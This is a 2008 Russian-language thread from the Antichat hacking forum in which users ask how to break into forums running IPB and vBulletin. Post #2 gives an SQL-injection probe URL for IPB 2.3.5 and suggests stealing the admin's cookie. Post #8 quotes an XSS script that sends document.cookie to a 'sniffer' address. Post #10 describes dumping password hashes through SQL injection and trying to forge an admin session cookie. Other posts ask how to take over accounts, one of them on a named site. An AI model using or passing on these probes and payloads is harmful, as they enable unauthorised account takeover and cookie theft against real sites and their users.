HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.12.2008, 21:36
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию

Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.
 
Ответить с цитированием

  #2  
Старый 04.12.2008, 01:07
NewBHack
Познающий
Регистрация: 24.11.2008
Сообщений: 35
Провел на форуме:
126200

Репутация: 4
По умолчанию

Цитата:
Сообщение от Taylorith  
Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.
Под 2.3.5 есть эксплоит поищи на этом форуме... но если админ толковый, хотя у толкового уже 2.3.6 было бы , то дырку сразу пропатчили...

Проверяется просто после index.php? добавляешь:
act=xmlout&do=check-display-name&name=%2527 и если увидишь сообщение мол драйвер не работает, то этот форум о тебе услышит

Если нет, то есть куча способов (хотя нет не куча, кучка, маленькая такая.... ) как угнать куку админа!

А вот пиляха как её заюзать, учитывая что эта гадость проверяет IP, не знаю... Это надо ГУРУ спрашивать, они знают. ТОка мож эта инфа пока что приватная

Есть спец тулзы которые позволяют менять хидеры на лету, но вот тока где в в ипб лежит инфа про ИП - хоть убейте не вижу Пробовал подменить свой айпи на 2ip.ru - нивопрос, получилось, а вот на IPB ...

Успехов.

Последний раз редактировалось NewBHack; 04.12.2008 в 01:12..
 
Ответить с цитированием

Драсти
  #3  
Старый 04.12.2008, 18:54
RomaM65
Новичок
Регистрация: 01.12.2008
Сообщений: 10
Провел на форуме:
10359

Репутация: 0
По умолчанию Драсти

Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет?
 
Ответить с цитированием

  #4  
Старый 04.12.2008, 20:06
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
По умолчанию

Цитата:
Сообщение от RomaM65  
Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет?
админу отписать ..и рассказать ситуацию...
 
Ответить с цитированием

  #5  
Старый 04.12.2008, 20:27
RomaM65
Новичок
Регистрация: 01.12.2008
Сообщений: 10
Провел на форуме:
10359

Репутация: 0
По умолчанию

Админа на форуме уже 2 месяца нет поетому и хочу ломонуть
 
Ответить с цитированием

  #6  
Старый 06.12.2008, 16:14
super-rol
Новичок
Регистрация: 28.07.2007
Сообщений: 2
Провел на форуме:
133963

Репутация: 0
По умолчанию

Помогите , есть ли возможность узнать пароль на закрытй форум ? ipb 2.1.6 .
 
Ответить с цитированием

  #7  
Старый 06.12.2008, 16:22
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
По умолчанию

2super-rol
http://forum.antichat.ru/threadnav25088-1-10.html
Выбирай нужный)

Последний раз редактировалось Extremal; 06.12.2008 в 16:28..
 
Ответить с цитированием

  #8  
Старый 07.12.2008, 00:18
super-rol
Новичок
Регистрация: 28.07.2007
Сообщений: 2
Провел на форуме:
133963

Репутация: 0
По умолчанию

Можно ли с помощью снифера получить пароль пользователя на форуме ipb 2.1.6 ? используя функцию Жалоба , вставляя следующий код
Цитата:
<script>img = new Image(); img.src = "Адрес снифера?"+document.cookie;</script>
Какой текст нужно напсать чтобы аватар был снифером и крал куки ?

Последний раз редактировалось super-rol; 07.12.2008 в 02:45..
 
Ответить с цитированием

  #9  
Старый 15.12.2008, 01:03
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???
 
Ответить с цитированием

  #10  
Старый 18.12.2008, 16:38
evlenie
Новичок
Регистрация: 17.12.2008
Сообщений: 3
Провел на форуме:
4293

Репутация: 0
По умолчанию

Привет. Вообщем такая тема.Через скулю на сайте вытащил converge_pass_hash & pass_salt в надежде сбрутить пасс админа. Скока не брутил не получилось(наверн парольчик сложный). Потом решил зайт через куки,вытащил members_login_key но при входе идём проверку на какой-то ipb_stronghold,походу версия ipb новая т.к. в ранних такого небыло. нагуглил что эта хрень хэшируется из айпи айди пасса и ещё чего-то типо дополнительная защита при входе. так вот мне интересно можно как-нить потделать это при условии что айпи я знаю и всё остальное и зайдётли в админку с этими куками? Т.к. админка моя главная цель.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.